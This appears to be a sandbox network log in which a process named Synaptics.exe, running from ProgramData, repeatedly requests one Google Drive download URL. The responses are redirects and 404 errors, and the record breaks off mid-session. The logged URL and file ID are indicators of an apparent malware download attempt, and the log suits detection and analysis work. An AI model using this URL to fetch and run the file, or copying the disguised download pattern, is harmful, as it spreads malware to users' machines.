                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-cPikUqT6NfHYDPWP1uwGcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                71 | 192.168.2.4 | 50049 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:36 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-eqy1Lq0omu021OiZUNVm-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 50059 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:38 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3cV_-T7uqLYVlEGRVFX_2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 50060 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:38 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5_cFle3DLXFku0H4L9_XLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 50061 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC664O23TkCl0mP_zKOYnXz9pUqBg-lSkxlnehcM4q45z0NPYzwMpqfyZVwxtnxD7bRy
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gzHb37A3dDu2PAKfqlrN1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
2024-12-24 17:21:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-24 17:21:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="G3DIb_C7xaroFqtNG3NGBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-24 17:21:39 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 50062 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:39 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6anN6xTThJPNxJh4-oRxnx-Y-LyqS9o3ErQtwk0A3QmlwB-oTqs5JNz6LOhpDonrX-IKEELzw
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-sE3a1WlXghqLlKqVoNJNNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
2024-12-24 17:21:39 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 17:21:39 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="zkMtRYPBQvM_DEmC4IzxMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-24 17:21:39 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 50079 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:41 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-k0ayyOlD7IQUHkqBChllFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 50080 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:41 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BsdafHBSeQwnaJwpqtIitQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50091 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:44 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4S99C6FJ_ymN-OcNZ624E2o0fYScXPrcR6RPWd5ZmcfOU43HWcCILwegSf7imVW5lEGKaiW_Y
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:44 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-t9hZTDDEy-CmHqskxMsdsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
2024-12-24 17:21:45 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 17:21:45 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="E4F5Kymi1IorWmRJat_PTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-24 17:21:45 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50089 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:44 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:44 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HhkKwrWHxl-2oeibInIdOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50090 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:44 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:44 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mYaaHM0sLulRzBZcLCKnyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
